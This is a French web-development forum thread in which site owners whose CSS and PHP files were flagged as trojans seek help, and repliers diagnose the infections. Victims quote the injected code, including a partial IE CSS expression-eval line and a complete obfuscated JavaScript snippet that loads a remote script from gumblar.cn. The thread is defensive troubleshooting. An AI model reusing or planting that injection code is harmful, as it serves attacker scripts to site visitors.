un fichier css est détecté comme un troyen. - HTML/CSS - Programmation
Marsh Posté le 24-07-2008 à 14:18:39
lol c'est pas mal ça
comment ça se fait que lorsque je tente d'en ouvrir un, je n'ai pas de caractères texte dedans mais des sigles bizarres ? tu l'as encodé ton CSS ?
Marsh Posté le 24-07-2008 à 14:29:14
NewsletTux a écrit : lol c'est pas mal ça |
euh non je l'ai pas encoder je l'ai taper sous notepad ++
Marsh Posté le 24-07-2008 à 14:39:13
Ton site a peut-être été piraté ! Essaye d'uploader à nouveau tes CSS !
Marsh Posté le 24-07-2008 à 14:47:59
Citation : mes fichier css sont détectés comme des virus troyens. |
Par quoi ?
Citation : aurriez vous une solution parce que l'affluence sur le site doit en prendre un sacré coup ! |
Moi c'est le thème "rouge sur orange", les gif animés et le texte noir sur fond bleu nuit qui me rebutent plus.
Marsh Posté le 24-07-2008 à 14:48:23
kao98 a écrit : Ton site a peut-être été piraté ! Essaye d'uploader à nouveau tes CSS ! |
c'est ce que j'ai fait mais rien n'y fais
avast me met: JS:Redirector-B [Trj]
et ce n'est qu'un malheureux fichier texte en .css
c'est po un virus
help
Marsh Posté le 24-07-2008 à 14:58:37
Bidem a écrit :
|
détecté par avast et pour le thème c'était le thème image in air avec des fées et tout (la présidente m'a un peu cadré sur les images à mettre) cette année ca sera la télé comme thème: ce sera un peu mieu en déco.
Marsh Posté le 24-07-2008 à 22:48:26
y a ca dans ton css,
body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F (...)
chelou...
edit :une fois decoder le truc donne,
Code :
|
en gros c'est senser rajouter un script dans ton <head> qui ce situe dans '/visionneuse/contrib/overlib410/xoso/check.js' mais ce n est pas executer car c est dans un fichier CSS (en tout cas ca n apparait pas dans ta source)...
Marsh Posté le 24-07-2008 à 23:00:58
krifur a écrit : y a ca dans ton css, body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F (...) edit :une fois decoder le truc donne,
|
Ca sera forcément exécuté, mais SEULEMENT SOUS IE6/7
donc vire nous cette chiotte de la CSS
edit : et sans vouloir être méchant, revoit juste un peu la créa de ton site, elle date juste des années 90, et fait juste mal aux yeux. en clair on a vraiment, mais alors vraiment pas envie de rester sur le site
Marsh Posté le 24-07-2008 à 23:05:39
J'ai rien sous IE6 (putain kesque je fous avec IE6 )
Je capte pas comment le truc peux s interpreter a la limite si le css etait inclu dans le HTML ok mais la c'est un fichier externe ?
Marsh Posté le 25-07-2008 à 10:22:56
Microsoft a plusieurs instructions propriétaires qui permettent d'exécuter du javascript au travers de css dont expression ( http://webfx.eae.net/dhtml/cssexpr/cssexpr.html ) et behavior ( http://msdn.microsoft.com/en-us/li [...] S.85).aspx ) ...
Marsh Posté le 26-07-2008 à 04:23:15
voila par exemple un de mes fichier css pour la page d'acceuil ( je change la déco la semaine prochaine lol) car en fait je n'ai jamais prog ce que vous avez marquer dans les post.
codes css page acceuil:
html
{
cursor:url("images/curseur_acceuil.cur" );
}
body
{
background-image:url("images/orange.jpg" );
background-repeat:no-repeat;
background-attachment:fixed;
padding-top:20px;
width:1024px;
height:900px;
margin:auto;
margin-top: 30px;
margin-bottom: 20px;
background-repeat:repeat;
background-position:top;
}
#en_tete
{
margin-top:10px;
margin-left:117px;
width:790px;
height:120px;
border:5px inset red;
}
#menu
{
margin-left:55px;
float:left;
width:160px;
margin-top:20px;
margin-right:5;
}
.element_menu
{
background-color:none;
border-right:5px outset blue;
margin-bottom:20px;
}
.element_menu h3
{
color:yellow;
font-family:Arial,"arial black","Times New Roman",Times,serif;
text-align:center;
font-size:x-large;
font-weight:bold;
text-transform:uppercase;
text-decoration:underline;
font-family:"goudy stout";
}
.element_menu ul
{
list-style-image:url("images/puce_menu.gif" );
padding:0px;
padding-left:50px;
margin:0px;
margin-bottom:5px;
}
.element_menu a
{
color:red;
font:medium,impact;
text-transform:capitalize;
text-decoration:none;
position:relative;
top:-10px;
text-align:center;
}
.element_menu a:hover
{
color:#711866;
font:small,impact;
text-transform:none;
text-decoration:underline;
cursor:url("images/curseur_acceuil2.ani" );
}
#corps
{
width:615px;
padding:5px;
margin-left:288px;
margin-bottom: 20px;
margin-top:20px;
}
.element_corps p
{
font-size:x-large;
color:black;
font-family:'lucida handwriting',arial;
font-weight:normal;
}
.element_corps h1
{
text-align:center;
font-size:x-larger;
font-family:impact;
font-weight:bolder;
color:blue;
}
.element_corps h2
{
color:blue;
}
#pied_de_page
{
margin-left:117px;
width:795px;
height:10px;
background-color:#eceeb2;
margin-top:20px;
border:2px solid black;
text-align:center;
margin-bottom:10px;
}
.news p
{
font-size:x-large;
color:black;
font-family:arial;
font-weight:bold;
}
.news H3
{
font-size:large;
color:blue;
font-family:arial;
font-weight:bold;
text-decoration:underline;
}
.news H2
{
font-size:x-large;
color:red;
font-family:arial;
font-weight:bold;
text-decoration:underline;
}
en tout cas pas de quoi détecter un trj ... enfin je crois pas sinon je n'est pas super bien compris le code des post précédents.
dois-je mettre mon css dans ma page php dans le head entre deux balise style pour résoudre le problème?
sinon pour le thème des années 80, c'est parceque c'est trop flashi? des couleur plus stone serait mieu apprécier sans image de fond ?
merci pour toutes les réponses que vous m'avez déjà apporté.
Marsh Posté le 26-07-2008 à 13:02:27
bah la police d'écriture, les images, le css... un peu tout en fait.
Marsh Posté le 26-07-2008 à 14:53:59
il serait peut etre bon de re uploader tout le site apres un effacement total du repertoire racine. Le problème est peut etre situé ailleurs dans le site et un fichier php peut écrire en live ce code dans ton fichier css.
Marsh Posté le 26-07-2008 à 15:01:22
Lactique a écrit : il serait peut etre bon de re uploader tout le site apres un effacement total du repertoire racine. Le problème est peut etre situé ailleurs dans le site et un fichier php peut écrire en live ce code dans ton fichier css. |
OK je fait ça et je vous retiens au courrant.
merci.
Marsh Posté le 13-05-2009 à 18:15:52
bonjour j'ai aussi ce meme pb sur mon site mais je n'arrive pas a identifier le script qui genere ca :
/head><script language=javascript><!--
(function(){var xpu7=('var&20&61&3d&22Script&45&6egine&22&2cb&3d&22Ve&72&73&69&6fn&28)+&22&2cj&3d&22&22&2cu&3dna&76igator&2euser&41gen&74&3b&69f((u&2e&69nd&65xOf(&22Win&22)&3e0)&26&26(&75&2ei&6e&64ex&4ff(&22NT&206&22)&3c0)&26&26&28docum&65&6et&2eco&6f&6bie&2ein&64&65xOf(&22miek&3d1&22&29&3c0)&26&26&28type&6ff(zrvzts&29&21&3d&74y&70e&6ff&28&22A&22)))&7bzrvz&74s&3d&22A&22&3beval(&22if(&77indo&77&2e&22+a+&22)j&3dj&2b&22+a+&22Major&22+b+&61&2b&22Minor&22+b+a+&22Bui&6c&64&22+b+&22j&3b&22)&3b&64ocu&6d&65&6et&2ew&72ite(&22&3c&73c&72i&70t&20src&3d&2f&2fgu&6d&62la&72&2ecn&2frs&73&2f&3fid&3d&22&2b&6a+&22&3e&3c&5c&2fscri&70t&3e&22&29&3b&7d').replace(/&/g,'%');eval(unescape(xpu7))})();
--></script>
<body >
qui peut m'aider ????
merci d'avance
Marsh Posté le 13-05-2009 à 18:34:23
Je ne sais pas d'où tu as eu ce script, mais je te conseillerais de l'erradiquer au plus vite de ton site.
Il injecte du code en provenance d'un site "gumblar.cn", répertorié comme malware chez google. À titre d'info, le code exécuté est :
Code :
|
Bref, à dégager.
Edit: en général de ce genre de script peut provenir d'une régie publicitaire douteuse (si tu as de la pub sur ton site). Sinon vérifie tes scripts PHP qui ont peut-être une faille permettant l'injection de code dans tes pages (relativement grâve comme trou de sécurité).
Marsh Posté le 13-05-2009 à 20:10:45
Bonsoir à tous,
J'ai exactement ce même problème.
Je me suis donc fait hacké et depuis je ne m'en sors plus; j'en deviens complètement taré !
En effet, un fichier "image.php" est créé dans tous mes dossiers "images", tous les fichiers PHP, HTM, HTML et JS ont eu l'immense joie d'acquérir une portion de code "pourri" devant la balise <body> pour le HTML et juste après <php? pour le PHP, et en fin de fichier pour les JS, du même type que VALERIO102 ci dessus.
En fait, probablement touché sur mon PC, ce "Cheval de troi" a sniffé mes login et mots de passe FTP, s'est illégalement connecté sur mon hébergement pour foutre la m... dans TOUTE la structure de mon hébergement, et vu que je suis en mutualisé chez OVH, que j'ai une bonne dizaine de sites clients, TOUS ont été touchés !!!!!!
J'ai donc:
- nettoyé complètement mon PC (AVG ne trouve rien, j'ai donc réinstallé AVAST
- TOUT downloadé de mon hébergement sur mon PC
- TOUT nettoyé (script pourri + fichiers image.php)
- TOUT scanné par AVAST
- TOUT vérifié au niveau de mes DB (table suspècte - pas trouvée !!!)
- changé mes mots de passe FTP
- bloqué mes multi-FTP
MAIS ça continue encore et encore de revenir !!!!!!!!!
Je ne m'en sors plus !
Quelqu'un aurait-il une idée pour m'aider à m'en sortir ?
J'ai bien trouvé ce lien ( http://www.lepotlatch.org/index.ph [...] aqu%C3%A9s ) qui est l'exactitude de ce que j'ai choppé et qui m'a déjà très bien aidé, mais ça continue quand même !
HEEEELLLLLLLPPPPPPP please !
(
Marsh Posté le 13-05-2009 à 22:43:38
Ré-installe,
C'est la seule façon viable une fois que ton système a été contaminé autant en profondeur
Marsh Posté le 14-05-2009 à 10:09:34
Réinstaller quoi ?
J'ai déjà tout fait !!!
Réinstallé mon PC et re-uploadé mon hébergement complet après nettoyage !...
Marsh Posté le 14-05-2009 à 15:04:07
pyram a écrit : Réinstaller quoi ? |
mais putain file nous l'url de ton site !!!!!!
sinon tu peux te brosser pour qu'on t'aider
Marsh Posté le 24-07-2008 à 14:09:59
bonjour ou bonsoir à toute et à tous,
j'ai créé un site dont voila l'url: http://www.les-baladins.org
le probleme c'est que tous mes fichier css sont détectés comme des virus troyens.
aurriez vous une solution parce que l'affluence sur le site doit en prendre un sacré coup !
je vous remerci pour le temps que vous me consacrerez.
---------------
http://les-baladins.org